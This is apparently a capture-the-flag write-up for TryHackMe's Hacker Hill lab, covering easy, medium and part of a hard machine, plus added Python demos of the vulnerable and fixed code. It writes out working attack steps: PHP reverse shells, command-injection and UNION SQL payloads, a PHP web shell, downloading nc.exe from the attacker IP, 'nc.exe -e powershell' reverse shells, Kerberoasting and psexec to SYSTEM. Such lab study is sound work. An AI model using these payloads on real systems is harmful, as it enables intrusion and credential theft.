Disclaimer
The hosts attacked in this article were legally authorised targets. The tools and methods shown are for learning and exchange only; do not use them, or the attack paths described, for any illegal purpose. I accept no responsibility for any consequences of doing so, nor for any misuse or damage caused.
Easy Challenge
Service discovery
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.134.251
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 04:36 EDT
Nmap scan report for 10.10.134.251
Host is up (0.31s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8002/tcp open http Apache httpd 2.4.29 ((Ubuntu))
9999/tcp open abyss?
Directory brute-force on port 8000
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u 10.10.134.251:8000
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100
Error Log: /root/dirsearch/logs/errors-21-10-25_04-57-13.log
Target: 10.10.134.251:8000
[04:57:13] Starting:
[04:57:22] 200 - 2KB - /about
[04:57:33] 200 - 2KB - /contact
[04:57:47] 500 - 613B - /public_html/robots.txt
[04:57:47] 200 - 30B - /robots.txt
robots.txt reveals a CMS path:
User-agent: *
Disallow: /vbcms
Opening it gives a login page. Trying admin:admin actually logs in...
Inside is a page editor that lets you change the page source directly. PHP written into it is executed, which makes this easy: just write a shell.
Start a listener on a port, write the reverse shell into the home page, then visit it to trigger the callback.
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.134.251] 59268
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
10:30:53 up 1:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ whoami
serv1
Following the hint, the first flag is at /usr/games/fortune; submit it on the flag-exchange site to receive the flag TryHackMe wants.
The second and third are at /var/lib/rary and /var/www/serv4/index.php respectively, as directed, and are exchanged on the same site for the required flags.
Privilege escalation
Uploaded linpeas.sh, which shows that /home/serv3/backups/backup.sh is a scheduled task run as root once a minute.
Check the permissions on the script
serv1@web-serv:/tmp$ ls -alh /home/serv3/backups/backup.sh
ls -alh /home/serv3/backups/backup.sh
-r-xr-xr-x 1 serv3 serv3 52 Feb 15 2021 /home/serv3/backups/backup.sh
serv1 has no permission to edit this file, so we need to move laterally to serv3 first.
In /var/www/html/topSecretPrivescMethod there is a secret.txt; judging by the folder name it describes a privesc method, but the contents are unreadable gibberish.
The PHP runner page at :8002/lesson/1 should have allowed a PHP reverse shell directly, but the page pulls in a Google front-end framework and the reverse shell would not fire.
After some effort...
Back on that page, a PHP reverse shell was written in and gives a shell as serv3.
┌──(root㉿kali)-[~/tryhackme/hackhill]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.172.149] 33814
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
14:49:20 up 1:13, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
Append the following line to backup.sh so that the root cron job sets the SUID bit on bash (backup.sh is mode r-xr-xr-x, but serv3 owns it, so it can add the write bit with chmod u+w first if the append is refused):
echo "chmod 4777 /bin/bash" >> /home/serv3/backups/backup.sh
After waiting a minute, run /bin/bash -p to get root (the -p flag stops bash from dropping the effective UID of 0).
serv3@web-serv:/$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)
bash-4.4# cat /root/root.txt
Medium Challenge
Service discovery
┌──(root㉿kali)-[~/tryhackme/hackhill]
└─# nmap -sV -Pn 10.10.48.179
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 10:00 EDT
Nmap scan report for 10.10.48.179
Host is up (0.32s latency).
Not shown: 985 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
81/tcp open http Microsoft IIS httpd 10.0
82/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-10-25 14:01:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
9999/tcp open abyss?
The medium box is a Windows machine with many services open; look at them one at a time.
80, 81 and 82 are all HTTP; brute-force directories on each.
80
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.48.179/_21-10-25_10-10-52.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-10-52.log
Target: http://10.10.48.179/
[10:10:53] Starting:
[10:11:00] 200 - 2KB - /%3f/
[10:11:00] 403 - 312B - /%2e%2e//google.com
[10:11:00] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:11:09] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:11:28] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:11:33] 302 - 0B - /dashboard -> /login
[10:11:48] 200 - 3KB - /login
[10:11:48] 200 - 3KB - /login/
[10:11:49] 302 - 0B - /logout/ -> /
[10:11:49] 302 - 0B - /logout -> /
[10:12:26] 302 - 0B - /profile -> /login
[10:12:45] 200 - 3KB - /signup
81
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179:81
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.48.179-81/_21-10-25_10-27-15.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-27-15.log
Target: http://10.10.48.179:81/
[10:27:16] Starting:
[10:27:22] 200 - 5KB - /%3f/
[10:27:22] 403 - 312B - /%2e%2e//google.com
[10:27:23] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:27:31] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:27:57] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:28:32] 400 - 24B - /ping
82
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179:82
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.48.179-82/_21-10-25_10-29-15.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-29-15.log
Target: http://10.10.48.179:82/
[10:29:16] Starting:
[10:29:24] 403 - 312B - /%2e%2e//google.com
[10:29:25] 404 - 1KB - /+CSCOE+/session_password.html
[10:29:25] 404 - 1KB - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[10:29:25] 404 - 1KB - /+CSCOE+/logon.html#form_title_text
[10:29:25] 404 - 1KB - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[10:29:25] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:29:26] 404 - 1KB - /.config/psi+/profiles/default/accounts.xml
[10:29:41] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:30:15] 404 - 1KB - /bitrix/web.config
[10:30:17] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:30:19] 404 - 1KB - /cms/Web.config
[10:30:30] 404 - 1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:30:41] 404 - 1KB - /lang/web.config
[10:30:50] 404 - 1KB - /modules/web.config
[10:31:00] 404 - 1KB - /plugins/web.config
[10:31:19] 404 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
[10:31:19] 404 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt.sql
[10:31:24] 404 - 1KB - /web.config
Port 80 runs an upload service that only accepts .jpg files; attempts to bypass the filter failed.
Port 81 runs a service that pings a hostname; command-injection bypasses in the input did not seem to work.
Port 82 showed nothing useful at first glance.
Looking at the port 81 URL, :81/ping?id=1, testing shows the id parameter is SQL-injectable, so this should be the attack point.
Enumerate the database
sqlmap -u "http://10.10.48.179:81/ping?id=1" -p "id" --batch --dbms=mysql --technique B --dbs
available databases [2]:
[*] information_schema
[*] networkmonitor
Other information
Table: host; columns: id, ip
User: monitor_read@localhost
Password: could not be enumerated
getshell
I could not get this shell to work on my own; the method here follows another writeup.
On the http://10.10.48.179/profile page the username field can be changed freely,
and each time it is changed, the path of the previously uploaded files changes accordingly.
So the upload code is probably something like:
$old_username = 'admin';
$new_username = $_POST['username'];
system('mv ' . $old_username . ' ' . $new_username);
Because the username is user-controlled (the new value directly, and $old_username through the previous change), there may well be an OS command injection here.
Verification:
Start tcpdump on the attacking machine to capture all ICMP packets
tcpdump -i tun0 icmp
Set the username to the payload:
admin_test | ping 10.13.21.169
If the listener receives ping packets, the command injection works.
Ping packets received:
┌──(root㉿kali)-[~]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:36:08.012297 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 13, length 40
09:36:08.012335 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 13, length 40
09:36:09.008655 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 14, length 40
09:36:09.008693 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 14, length 40
09:36:10.024224 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 15, length 40
09:36:10.024241 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 15, length 40
09:36:11.047680 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 16, length 40
09:36:11.047696 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 16, length 40
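To show why the guessed mv construction above is injectable and what the fix looks like, here is an added Python example; it is not the room's code or the referenced writeup's. The allow-list pattern, the temporary directory and the use of a local echo instead of the page's out-of-band ping are all assumptions made so the demonstration runs stand-alone.

```python
import os
import re
import subprocess
import tempfile

# Assumed allow-list policy for usernames: letters, digits, underscore, 1-32 characters.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def vulnerable_rename(base_dir, old_username, new_username):
    """Models the guessed PHP: system('mv ' . $old . ' ' . $new). The string goes through a shell,
    so a '|' in the new username starts a second command. Returns whatever that shell printed."""
    cmd = f"mv {old_username} {new_username}"
    result = subprocess.run(cmd, shell=True, cwd=base_dir, capture_output=True, text=True)
    return result.stdout


def safe_rename(base_dir, old_username, new_username):
    """Allow-list both names and rename without a shell. Returns the new directory path."""
    for name in (old_username, new_username):
        if not USERNAME_RE.fullmatch(name):
            raise ValueError(f"invalid username: {name!r}")
    src = os.path.join(base_dir, old_username)
    dst = os.path.join(base_dir, new_username)
    os.rename(src, dst)  # direct syscall, no command line to inject into
    return dst


def demo():
    """Runs both versions against a constructed directory layout and reports what happened."""
    with tempfile.TemporaryDirectory() as base:
        os.mkdir(os.path.join(base, "admin"))
        # Same shape as the page's probe "admin_test | ping <attacker>", with echo as the harmless stand-in.
        probe = "admin_test | echo INJECTED"
        injected_output = vulnerable_rename(base, "admin", probe).strip()
        mv_still_ran = os.path.isdir(os.path.join(base, "admin_test"))  # mv ran as the first pipeline stage
        try:
            safe_rename(base, "admin_test", probe)
            blocked = False
        except ValueError:
            blocked = True
        new_dir = safe_rename(base, "admin_test", "newname")
        return {
            "injected_output": injected_output,
            "mv_still_ran": mv_still_ran,
            "blocked": blocked,
            "renamed_to": os.path.basename(new_dir),
        }


if __name__ == "__main__":
    print(demo())
```

The vulnerable path still performs the rename, which is why the injection is silent from the user's point of view and an out-of-band signal such as the ICMP probe above is the practical way to confirm it.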
Upload nc.exe to the target so we can get a reverse shell (the token cookie is the logged-in session cookie; the command is injected through the same username field):
curl -H "Cookie:token=eyJ1c2VybmFtZSI6ImFkbWluIiwiY29va2llIjoiZWRkYjkzY2UxODY5OTkwZDMyY2Y3ZWMzYTQyYWQxYzgifQ==" -XPOST http://10.10.48.179/profile -d 'username=asd | powershell curl 10.13.21.169:8000/nc.exe -o nc.exe'
Open another window and listen
nc -lnvp 4242
Trigger the payload on the target:
admin1 | nc.exe 10.13.21.169 4242 -e powershell
Reverse shell received
┌──(root㉿kali)-[~]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 50099
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\agamemnon\Desktop\WebApp\public> whoami
whoami
troy\agamemnon
The agamemnon user flag is in C:\Users\agamemnon\Desktop
List all the users
PS C:\> net users
net users
User accounts for \\TROY-DC
-------------------------------------------------------------------------------
achilles Administrator agamemnon
Guest hector helen
krbtgt patrocles
Uploaded winPEASx64.exe to enumerate; almost nothing useful.
Second shell
Since we already know port 81 has a SQL injection, look at what this webapp does: if we could change the value of the ip column in the host table, the same command injection would give us another shell.
After a lot of testing, the current database account has no permission to insert or update data.
Instead, use CONCAT to splice the injected command into the query result as a string. id=9999 matches no row, so the only row the UNION returns is the injected one, whose ip column is "|ipconfig"; the application pastes that column into its ping command line, so what it finally executes is ping |ipconfig.
The payload:
id=9999 UNION SELECT NULL,CONCAT("|","ipconfig")-- -
When injecting through Burp Suite the payload above has to be URL-encoded, otherwise the server returns 400.
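To make the second-order injection above concrete, here is an added Python example (not code from the room or from the author's exploit) that models the port 81 handler with an in-memory SQLite database. The table host(id, ip) comes from the enumeration above; a CONCAT function is registered because SQLite lacks one, so the page's payload runs with only its double quotes changed to single quotes; the ping command format is an assumption. The hardened handler binds id as a parameter and validates the ip column before it can reach a shell.

```python
import ipaddress
import sqlite3


def build_db():
    """Constructed stand-in for the networkmonitor database: table host(id, ip) as enumerated."""
    conn = sqlite3.connect(":memory:")
    # MySQL has CONCAT(); SQLite does not, so register one so the page's payload runs unchanged.
    conn.create_function("CONCAT", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.execute("CREATE TABLE host (id INTEGER PRIMARY KEY, ip TEXT)")
    conn.executemany("INSERT INTO host VALUES (?, ?)", [(1, "10.0.0.5"), (2, "10.0.0.6")])
    return conn


def vulnerable_ping_command(conn, user_id):
    """String-built query; the ip column is then pasted into a shell command line (assumed format)."""
    row = conn.execute(f"SELECT id, ip FROM host WHERE id = {user_id}").fetchone()
    if row is None:
        return None
    # The real app hands this string to a shell, so a leading '|' in the column starts a second command.
    return f"ping -n 1 {row[1]}"


def safe_ping_argv(conn, user_id):
    """Parameterised lookup plus validation of the stored value; returns an argv list (no shell)."""
    try:
        host_id = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    row = conn.execute("SELECT id, ip FROM host WHERE id = ?", (host_id,)).fetchone()
    if row is None:
        return None
    # Data read back from the database is still untrusted: it originated from user input at some point.
    ip = ipaddress.ip_address(row[1])  # raises ValueError for anything that is not an IP literal
    return ["ping", "-n", "1", str(ip)]


# The page's payload, single-quoted for SQLite; MySQL accepts either quoting style.
PAYLOAD = "9999 UNION SELECT NULL,CONCAT('|','ipconfig')-- -"

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_ping_command(db, "1"))
    print(vulnerable_ping_command(db, PAYLOAD))
    print(safe_ping_argv(db, "1"))
    try:
        safe_ping_argv(db, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

Binding the parameter alone would have stopped this particular chain, but the validation of the stored value matters too: a read-only account, as here, could not change the table, yet anyone who can write to it (or a future injection elsewhere) would otherwise still reach the shell.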
Now that we can inject commands, do as with the first shell: upload nc.exe, start a listener on the attack box and catch the reverse shell.
Upload nc.exe
id=9999 UNION SELECT NULL,CONCAT("|","powershell curl 10.13.21.169:8000/nc.exe -o nc.exe")-- -
Local listener
nc -lnvp 4444
Reverse shell
id=9999 UNION SELECT NULL,CONCAT("|","nc.exe 10.13.21.169 4444 -e powershell")-- -
Getting the shell
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 52658
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\helen\Desktop\WebApp\h1-tryhackme-medium-two-main\public> ls
PS C:\Users\helen\Desktop\WebApp\h1-tryhackme-medium-two-main\public> whoami
whoami
troy\helen
helen's flag is in C:\Users\helen\Desktop
Third shell
Getting a shell on the port 82 webapp is very tricky; the solution below follows another writeup.
Analysis
It is a submission form; after the data is submitted, a comment in the source of the next page shows this line:
Ticket saved to ../tickets/
But however we request it, the tickets folder cannot normally be reached.
From the earlier apps we know all the webapps live under public, so if we can point that path back into public we should be able to reach the ticket content over the web.
Testing shows the Email Address field accepts double quotes, and the address is allowed to end in .php.
So the payload is:
Email Address: "../public/"@aaa.php
Name: <?php system($_GET['c']); ?>
After submitting, the page shows:
saved to ../tickets/../public/@aaa.php
Trigger it by requesting:
:82/@aaa.php?c=whoami
The page returns the output of whoami
We now have a simple web shell.
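The quoted-local-part trick above comes down to the application trusting the address as a file name. The following added Python example (not the room's or the writeup's code) models that: the /srv/app layout with sibling public/ and tickets/ directories, the permissive email regex and the stripping of the quotes are assumptions chosen so that the page's payload behaves as described; the hardened function generates the file name server-side and adds a containment check as defence in depth.

```python
import os
import re
import secrets

# Assumed layout, mirroring the observation that every webapp on the box lives under public.
APP_ROOT = "/srv/app"
TICKET_DIR = os.path.join(APP_ROOT, "tickets")
PUBLIC_DIR = os.path.join(APP_ROOT, "public")

# Permissive address check that, like the target, accepts a quoted local part ("...") and any TLD.
EMAIL_RE = re.compile(r'^(?:"[^"@]*"|[A-Za-z0-9._%+-]+)@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')


def vulnerable_ticket_path(email):
    """Builds the save path from the address itself, quotes stripped (assumed from the 'saved to' line)."""
    if not EMAIL_RE.match(email):
        raise ValueError("invalid email address")
    return os.path.normpath(os.path.join(TICKET_DIR, email.replace('"', "")))


def is_inside(path, directory):
    """True if path resolves to a location under directory, with symlinks and '..' collapsed."""
    path, directory = os.path.realpath(path), os.path.realpath(directory)
    return os.path.commonpath([path, directory]) == directory


def safe_ticket_path(email):
    """Validates the address but never lets it choose the file name; then checks containment anyway."""
    if not EMAIL_RE.match(email):
        raise ValueError("invalid email address")
    path = os.path.join(TICKET_DIR, f"ticket-{secrets.token_hex(8)}.txt")
    if not is_inside(path, TICKET_DIR):
        raise ValueError("ticket path escapes the tickets directory")
    return path


def classify(email):
    """Where the vulnerable code would write the ticket: 'tickets', 'public' (web-reachable) or 'elsewhere'."""
    path = vulnerable_ticket_path(email)
    if is_inside(path, TICKET_DIR):
        return "tickets"
    if is_inside(path, PUBLIC_DIR):
        return "public"
    return "elsewhere"


if __name__ == "__main__":
    for addr in ('"../public/"@aaa.php', "alice@example.com", '"../../"@x.php'):
        print(addr, "->", vulnerable_ticket_path(addr), classify(addr))
    print(safe_ticket_path('"../public/"@aaa.php'))
```

Note that the regex is not the bug: quoted local parts are legal in e-mail addresses, so rejecting them is not the fix. The fix is that user input never becomes a path component.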
Upload nc.exe
:82/@aaa.php?c=powershell curl 10.13.21.169:8000/nc.exe -o nc.exe
Local listener
nc -lnvp 4445
Reverse shell
:82/@aaa.php?c=nc.exe 10.13.21.169 4445 -e powershell
Getting the shell
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 49810
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\hector\Desktop\WebApp\h1-tryhackme-medium-three-main\public> whoami
whoami
troy\hector
hector's flag is in C:\Users\hector\Desktop
Privilege escalation
Upload Rubeus.exe to the target
PS C:\Users\hector\Desktop> powershell curl 10.13.21.169:8000/Rubeus.exe -o Rubeus.exe
powershell curl 10.13.21.169:8000/Rubeus.exe -o Rubeus.exe
Kerberoast and write the service-account hash to dump.txt
PS C:\Users\hector\Desktop> .\Rubeus.exe kerberoast /outfile:dump.txt
.\Rubeus.exe kerberoast /outfile:dump.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : troy.thm
[*] Searching path 'LDAP://TROY-DC.troy.thm/DC=troy,DC=thm' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : achilles
[*] DistinguishedName : CN=Achilles,OU=Created Users,DC=troy,DC=thm
[*] ServicePrincipalName : TIME/TROY-DC.TROY.THM
[*] PwdLastSet : 19/02/2021 18:32:09
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\hector\Desktop\dump.txt
[*] Roasted hashes written to : C:\Users\hector\Desktop\dump.txt
Copy dump.txt back to Kali and crack it with john
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# john dump.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
winniethepooh (?)
1g 0:00:00:00 DONE (2021-10-28 02:40) 50.00g/s 153600p/s 153600c/s 153600C/s slimshady..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed
That gives achilles's password.
Logging in as Achilles with psexec.py turns out to give SYSTEM straight away: psexec.py uploads a binary to ADMIN$ and starts it as a service, and services run as NT AUTHORITY\SYSTEM, so achilles must hold local administrator rights on the DC.
┌──(root㉿kali)-[~/windowns-privilege/impacket]
└─# /opt/impacket/build/scripts-3.9/psexec.py TROY.thm/Achilles:winniethepooh@10.10.48.179
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.48.179.....
[*] Found writable share ADMIN$
[*] Uploading file cbyYanQp.exe
[*] Opening SVCManager on 10.10.48.179.....
[*] Creating service CRPo on 10.10.48.179.....
[*] Starting service CRPo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
With SYSTEM in hand we have every flag on this box.
Hard Challenge
Service discovery
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.243.173
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 04:04 EDT
Nmap scan report for 10.10.243.173
Host is up (0.33s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
81/tcp open http nginx 1.18.0 (Ubuntu)
82/tcp open http Apache httpd 2.4.41 ((Ubuntu))
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8888/tcp open http Werkzeug httpd 0.16.0 (Python 3.8.5)
9999/tcp open abyss?
Two SSH services and four HTTP services; the one on port 8888 is a Python webapp (Werkzeug).
Go through them one by one...
Port 81
Directory brute-force
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.243.173:81/ -e* -t 100
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-81/-_21-10-28_08-54-57.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_08-54-57.log
Target: http://10.10.243.173:81/
[08:54:59] Starting:
[08:55:40] 200 - 409KB - /access_log
[08:55:52] 301 - 178B - /images -> http://10.10.243.173/images/
[08:55:52] 403 - 564B - /images/
Task Completed
The first entry in /access_log exposes a directory, /s3cr3t_area; it holds an image and does not look useful.
Port 82
Directory brute-force
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.243.173:82/ -e* -t 100
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-82/-_21-10-28_08-49-12.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_08-49-12.log
Target: http://10.10.243.173:82/
[08:49:13] Starting:
[08:49:32] 400 - 304B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:50:35] 400 - 304B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:50:50] 200 - 21B - /feed
[08:50:55] 301 - 316B - /images -> http://10.10.243.173:82/images/
[08:51:23] 200 - 2KB - /search
[08:51:31] 301 - 0B - /t -> /t/
Found at :82/t/r/y/h/a/r/d/e/r/spamlog.log:
Nahamsec made me do it :(
Not useful.
There is a search box; intercept the search request in Burp Suite and save it to a file named data2
└─# cat data2
POST /search HTTP/1.1
Host: 10.10.243.173:82
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: http://10.10.243.173:82
Connection: close
Referer: http://10.10.243.173:82/search
Upgrade-Insecure-Requests: 1
q=a
sqlmap confirms a SQL injection; command and payload:
sqlmap -r data2 --level=5 --risk=3 --dbms=mysql
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND 3240=3240 AND 'UEDj%'='UEDj
Enumerated information:
Database: hillpics
Table: hill
Current user: 'hill'@'localhost'
Password: not obtainable
Current user role and privileges: USAGE (the lowest)
os-shell: not obtainable
Nothing else useful
Port 8888
Directory brute-force
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173:8888
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-8888/_21-10-28_09-36-47.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_09-36-47.log
Target: http://10.10.243.173:8888/
[09:36:47] Starting:
[09:38:05] 200 - 135B - /apps
[09:39:19] 200 - 45B - /users
Task Completed
/apps prints:
